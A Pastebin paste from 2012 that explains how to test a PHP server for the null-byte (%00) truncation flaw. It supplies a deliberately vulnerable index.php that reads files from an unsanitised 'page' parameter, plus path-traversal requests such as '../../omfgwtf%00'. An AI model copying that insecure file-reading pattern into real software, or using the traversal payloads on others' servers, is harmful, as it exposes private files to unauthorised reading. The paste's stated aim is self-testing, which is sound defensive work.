API tools faq
paste
scriptz-team

[TEST] TEST YOUR SERVER FOR NULLBYTE HACK [%00]

scriptz-team
Jun 2nd, 2012
134
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.08 KB | None | 0 0
raw download clone embed print report
  1. _____ _____ _ _____ _____ _____ _____ _____ _____
  2. ___| | __ |_| _ |_ _|___ ___|_ _| __| _ | |
  3. |_ -| --| -| | __| | | |- _|___| | | | __| | | | |
  4. |___|_____|__|__|_|__| |_| |___| |_| |_____|__|__|_|_|_|
  5. |s C R i P T z - T E A M . i N F O|████████████████████████████
  6.  
  7. - iNfO -
  8.  
  9. [TEST] TEST YOUR SERVER FOR NULLBYTE HACK [%00]
  10.  
  11. - NOtIcE -
  12.  
  13. Create new file index.php in folder /test/ -->
  14.  
  15. <?php
  16. $page = $_GET['page'];
  17. $module = ('./pages/'.$page.".txt");
  18.  
  19. echo file_get_contents($module);
  20. ?>
  21.  
  22. Create new file test.txt in folder /test/pages/ -->
  23. "YOU CAN SEE THiS"
  24.  
  25. Create new file omfgwtf.txt in folder /test/
  26. "!YOUR SERVER iS iNSECURED!"
  27.  
  28. Now run /test/index.php?page=test -->
  29. You shoud see "YOU CAN SEE THiS"
  30.  
  31. Then run /test/index.php?page=../../omfgwtf%00
  32. Then run /test/index.php?page=../omfgwtf%00
  33. -->
  34. You shoud NOT see "!YOUR SERVER iS iNSECURED!", if you see you KNOW WHATZ THATZ MEAN!
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!